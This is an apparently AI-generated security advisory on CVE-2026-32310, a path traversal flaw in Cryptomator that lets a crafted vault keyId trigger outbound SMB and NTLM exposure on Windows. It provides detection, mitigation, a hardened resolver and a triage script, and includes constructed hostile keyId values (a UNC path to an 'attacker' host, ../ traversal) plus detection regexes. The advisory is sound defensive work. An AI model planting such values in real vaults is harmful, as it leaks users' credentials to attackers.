CVE-2026-32310 Overview
CVE-2026-32310 is a path traversal vulnerability (CWE-22) in Cryptomator, the open-source client-side encryption tool for cloud storage. The flaw lies in the order of operations when a vault is opened: the vault configuration is parsed and acted on before its integrity is verified. The masterkeyfile loader takes the unverified keyId from the configuration, resolves keyId.getSchemeSpecificPart() directly against the vault directory and immediately calls Files.exists() on the result. Nothing constrains that value to a file inside the vault, so an attacker who controls the configuration can point it at a parent-directory escape (../), an absolute local path, or a UNC path.
Critical Impact
On Windows, Files.exists() on a UNC path such as masterkeyfile://attacker/share/masterkey.cryptomator makes the operating system open an SMB session to the named host, and depending on the NTLM policy in effect Windows may authenticate the current user to that host automatically. This happens as soon as the vault is opened, before the passphrase prompt, so a malicious vault configuration can hand an NTLM challenge-response to an attacker-controlled server without any further user action.
Affected Products
- Cryptomator 1.6.0 and later, before 1.19.1 (the path traversal affects every platform)
- The NTLM credential exposure applies to Cryptomator running on Microsoft Windows, where the resolved UNC path is handed to the SMB client
Discovery Timeline
- 2026-03-20 - CVE-2026-32310 published to NVD
- 2026-03-25 - Last updated in NVD database
Technical Details for CVE-2026-32310
Vulnerability Analysis
This vulnerability is classified as CWE-22 (Path Traversal). The core issue is a trust-before-verify design flaw in Cryptomator's vault configuration handling. When a user opens a vault, the application parses the configuration file and uses its keyId field to locate the master key file. That parsing and the resulting filesystem access happen before the configuration's cryptographic integrity has been verified, so the keyId is treated as trustworthy input when it is not.
The Windows case is the most dangerous because of how java.nio.file.Path.resolve() treats an argument that begins with two separators: it is an absolute UNC path, so resolving //attacker/share/masterkey.cryptomator against the vault directory does not yield a path under the vault but \\attacker\share\masterkey.cryptomator. The subsequent Files.exists() call hands that path to the Windows SMB client, which connects to the host and, subject to the NTLM policy, may authenticate the current user to it without any prompt. The only user action involved is opening the vault.
Root Cause
The root cause is missing input validation combined with a flawed order of operations. The masterkeyfile loader resolves the keyId as a filesystem path without sanitizing or constraining it, and, more critically, performs filesystem operations before the vault configuration's integrity has been verified. Anyone who can create or modify a vault configuration can therefore inject an arbitrary filesystem path that is accessed the moment a victim opens the vault.
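The following is an added example, not Cryptomator's code: it models the vulnerable resolution step described above (the Java pattern vaultPath.resolve(keyId.getSchemeSpecificPart())) with pathlib's PureWindowsPath, which applies Windows path semantics on any host, and places a hardened resolver beside it that validates the keyId before any filesystem access. VAULT_DIR and the KEY_IDS dictionary are constructed inputs, not values taken from a real vault.

```python
"""Model of the masterkeyfile keyId resolution behind CVE-2026-32310.

Added example, not Cryptomator's code. PureWindowsPath is used so the
Windows behaviour (UNC and drive-rooted paths replacing the vault
directory on join) can be reproduced on any operating system.
VAULT_DIR and KEY_IDS are constructed.
"""
from pathlib import PureWindowsPath

VAULT_DIR = PureWindowsPath(r"C:\Users\alice\Cryptomator\vault")  # assumed location

# Constructed keyId values: one benign, three hostile.
KEY_IDS = {
    "benign": "masterkeyfile:masterkey.cryptomator",
    "unc": "masterkeyfile://attacker/share/masterkey.cryptomator",
    "traversal": "masterkeyfile:../../../Windows/win.ini",
    "absolute": r"masterkeyfile:D:\loot\masterkey.cryptomator",
}


def scheme_specific_part(key_id: str) -> tuple[str, str]:
    """Split 'scheme:rest' the way java.net.URI.getSchemeSpecificPart() does."""
    scheme, sep, ssp = key_id.partition(":")
    if not sep:
        raise ValueError(f"keyId is not a URI: {key_id!r}")
    return scheme, ssp


def unsafe_resolve(vault_dir: PureWindowsPath, key_id: str) -> PureWindowsPath:
    """Vulnerable pattern: join the unverified value onto the vault directory
    (the real code then calls Files.exists() on it). Like java.nio.file.Path.resolve(),
    joining an absolute path, UNC paths included, discards vault_dir entirely."""
    _, ssp = scheme_specific_part(key_id)
    return vault_dir / ssp


def safe_resolve(vault_dir: PureWindowsPath, key_id: str) -> PureWindowsPath:
    """Hardened version: validate first, touch the filesystem only afterwards,
    and only ever return a path that lies inside vault_dir."""
    scheme, ssp = scheme_specific_part(key_id)
    if scheme != "masterkeyfile":
        raise ValueError(f"unsupported keyId scheme: {scheme!r}")
    candidate = PureWindowsPath(ssp)
    # A drive letter, a leading separator or a UNC prefix all make the path
    # absolute under Windows semantics; PureWindowsPath exposes them as drive/root.
    if candidate.drive or candidate.root:
        raise ValueError("keyId must be relative; absolute and UNC paths are rejected")
    if ".." in candidate.parts:
        raise ValueError("keyId must not contain parent-directory references")
    resolved = vault_dir / candidate
    if vault_dir not in resolved.parents:  # belt and braces: must stay inside the vault
        raise ValueError("keyId escapes the vault directory")
    return resolved


def verdict(vault_dir: PureWindowsPath, key_id: str) -> str:
    """'accepted' or 'rejected: <reason>' from the hardened resolver."""
    try:
        safe_resolve(vault_dir, key_id)
        return "accepted"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for name, key_id in KEY_IDS.items():
        print(f"{name:10} unsafe -> {unsafe_resolve(VAULT_DIR, key_id)}")
        print(f"{'':10} safe   -> {verdict(VAULT_DIR, key_id)}")
```

Running it shows the UNC keyId resolving to \\attacker\share\masterkey.cryptomator and the absolute keyId to D:\loot\masterkey.cryptomator, with the vault directory gone from both; the hardened resolver rejects all three hostile values before any exists() check could be made and accepts only the bare file name.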
Attack Vector
The attack requires user interaction (the victim opens a malicious vault) but no prior access to the victim's machine. A malicious vault configuration can reach the victim through several channels:
- Shared cloud storage: Since Cryptomator vaults are designed for cloud storage, an attacker with write access to a shared vault could modify the configuration
- Social engineering: Distributing a malicious vault archive via email, messaging, or file sharing platforms
- Compromised download sources: Replacing legitimate vault backups with malicious versions
When a Windows victim opens a vault whose keyId carries a UNC path, the resulting outbound SMB connection can be abused for:
- NTLM relay attacks against other services the victim's account can reach
- Capture of the NTLMv2 challenge-response for offline cracking
- Disclosure of the victim's username, hostname and domain to the attacker's server
The attacker needs no credentials of their own, and the victim never types anything into Cryptomator: the filesystem access happens before the passphrase prompt.
Detection Methods for CVE-2026-32310
Indicators of Compromise
- Outbound SMB traffic (TCP 445) to non-internal IP addresses at the moment a Cryptomator vault is opened
- Vault configuration files (vault.cryptomator) whose keyId is anything other than a bare file name, in particular masterkeyfile:// URIs that name a host, contain ../ components, or carry an absolute path
- Network connections from the Cryptomator process to unknown external hosts
- Outgoing NTLM authentication from the victim to an unexpected server. Note that Event ID 4625 (logon failure) is written on the machine that receives the logon attempt, i.e. the attacker's server, not on the victim; to see the outgoing attempt on the client, set "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Audit all and watch Event ID 8001 in the Microsoft-Windows-NTLM/Operational log
Detection Strategies
- Monitor outbound SMB connections from Cryptomator processes, especially to non-internal destinations
- Implement network segmentation rules blocking outbound SMB (port 445) to external networks
- Use endpoint detection to alert on file path traversal patterns in vault configuration files
- Deploy network monitoring to detect NTLM authentication attempts to untrusted servers
Monitoring Recommendations
- Enable NTLM auditing (the Restrict NTLM policies in Audit mode) and forward the Microsoft-Windows-NTLM/Operational log to central collection so outgoing NTLM to unexpected hosts is visible
- Configure firewall rules to log and alert on outbound SMB connection attempts
- Use EDR or Sysmon network-connection telemetry (Sysmon Event ID 3) to record connections made by the Cryptomator process; application allow-listing controls what runs but does not observe network activity
- Inspect vault.cryptomator for unexpected keyId values before opening a vault from an untrusted source; the JWT header can be decoded without the passphrase
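The check recommended in the last two indicators (suspicious masterkeyfile:// URIs in the configuration, reviewing keyId values before opening) can be scripted. The following is an added example, not part of Cryptomator or of this advisory. It assumes the documented vault.cryptomator layout, a JWT whose header carries the keyId in the kid claim, and decodes that header without verifying the signature, which is adequate for triage but is not integrity verification. The allow-list and the hostile-pattern labels are this example's own choices, and the SAMPLES are constructed tokens with a dummy signature segment, not real vault files.

```python
"""Triage of Cryptomator vault.cryptomator files for hostile keyId values.

Added example, not Cryptomator's code. The JWT header is read WITHOUT
signature verification: this is inspection before opening a vault, not a
substitute for the integrity check the application must perform itself.
The SAMPLES are constructed with a fixed dummy signature segment.
"""
import base64
import json
import re

# Allow-list: a bare file name directly inside the vault directory, nothing else.
SAFE_KID = re.compile(r"^masterkeyfile:(?!\.\.?$)[^/\\:]+$")

# Labels for the report; first match wins, so the UNC check precedes the absolute one.
HOSTILE_PATTERNS = (
    (re.compile(r"^(?!masterkeyfile:)"), "unexpected keyId scheme"),
    (re.compile(r"^masterkeyfile:(//|\\\\)"), "UNC path (outbound SMB, NTLM exposure on Windows)"),
    (re.compile(r"^masterkeyfile:([A-Za-z]:|[/\\])"), "absolute local path"),
    (re.compile(r"(^|[:/\\])\.\.([/\\]|$)"), "parent-directory traversal"),
)


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def read_vault_config(token: str) -> tuple[dict, dict]:
    """Return (header, payload) of a vault.cryptomator JWT without verifying it."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT: expected three dot-separated segments")
    return json.loads(_b64url_decode(parts[0])), json.loads(_b64url_decode(parts[1]))


def triage_kid(kid: str):
    """None when kid is on the allow-list, otherwise a short reason string."""
    if SAFE_KID.match(kid):
        return None
    for pattern, reason in HOSTILE_PATTERNS:
        if pattern.search(kid):
            return reason
    return "keyId outside allow-list"


def triage_vault_config(token: str) -> dict:
    """Summarise one vault.cryptomator token for an analyst."""
    header, payload = read_vault_config(token)
    kid = header.get("kid", "")
    return {
        "kid": kid,
        "alg": header.get("alg"),
        "format": payload.get("format"),
        "finding": triage_kid(kid),
    }


# ---- constructed samples (dummy signature segment; not real vault files) ----
def _fake_jwt(header: dict, payload: dict) -> str:
    def enc(obj):
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{enc(header)}.{enc(payload)}.ZHVtbXktc2lnbmF0dXJl"


_PAYLOAD = {"format": 8, "cipherCombo": "SIV_GCM", "shorteningThreshold": 220}
_HDR = {"typ": "JWT", "alg": "HS256"}
SAMPLES = {
    "benign": _fake_jwt({"kid": "masterkeyfile:masterkey.cryptomator", **_HDR}, _PAYLOAD),
    "unc": _fake_jwt({"kid": "masterkeyfile://attacker/share/masterkey.cryptomator", **_HDR}, _PAYLOAD),
    "traversal": _fake_jwt({"kid": "masterkeyfile:../../../Users/Public/masterkey.cryptomator", **_HDR}, _PAYLOAD),
    "absolute": _fake_jwt({"kid": r"masterkeyfile:C:\Users\Public\masterkey.cryptomator", **_HDR}, _PAYLOAD),
    "scheme": _fake_jwt({"kid": "file:///C:/Users/Public/masterkey.cryptomator", **_HDR}, _PAYLOAD),
}


def scan_samples() -> dict:
    """Map sample name -> finding (None means the keyId looks benign)."""
    return {name: triage_vault_config(token)["finding"] for name, token in SAMPLES.items()}


if __name__ == "__main__":
    for name, finding in scan_samples().items():
        print(f"{name:10} {finding or 'ok'}")
```

To use it against real files, read each vault.cryptomator into a string and pass it to triage_vault_config(); treat any non-None finding as a reason not to open the vault until the configuration has been checked by hand. An allow-list is deliberately chosen over a deny-list here: the only legitimate shape is a file name inside the vault directory, so anything else is flagged even if it matches none of the labelled patterns.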
How to Mitigate CVE-2026-32310
Immediate Actions Required
- Upgrade Cryptomator to version 1.19.1 or later immediately
- Block outbound SMB traffic (TCP port 445) to external networks at the firewall level
- Review any recently opened vaults for suspicious configuration entries
- Audit shared vault repositories for unauthorized configuration modifications
Patch Information
Cryptomator 1.19.1 addresses this vulnerability; the fix ensures that the vault configuration's integrity is verified before the keyId field is parsed and used. Update through your package manager or from the official Cryptomator release page.
For detailed technical information about the fix, see GitHub Pull Request #4180 and the security advisory GHSA-5phc-5pfx-hr52.
Workarounds
- Block outbound SMB (TCP 445) at the host firewall. Be aware that when SMB is unreachable Windows can retry a UNC path over WebDAV through the WebClient service, which can also carry NTLM, so disable that service as well or rely on the NTLM policy below
- Only open vaults from trusted sources, and inspect the vault configuration's keyId before opening a vault you did not create
- Restrict outgoing NTLM with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy (Deny all, with exceptions for known servers), or disable NTLM where the environment allows it
- Use network monitoring to detect and block unexpected outbound connections from the Cryptomator process
# Windows Firewall rule blocking all outbound SMB (TCP 445). As written it also blocks
# internal file servers; add remoteip=<external ranges> to scope it if that is not acceptable.
netsh advfirewall firewall add rule name="Block Outbound SMB" dir=out action=block protocol=tcp remoteport=445
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

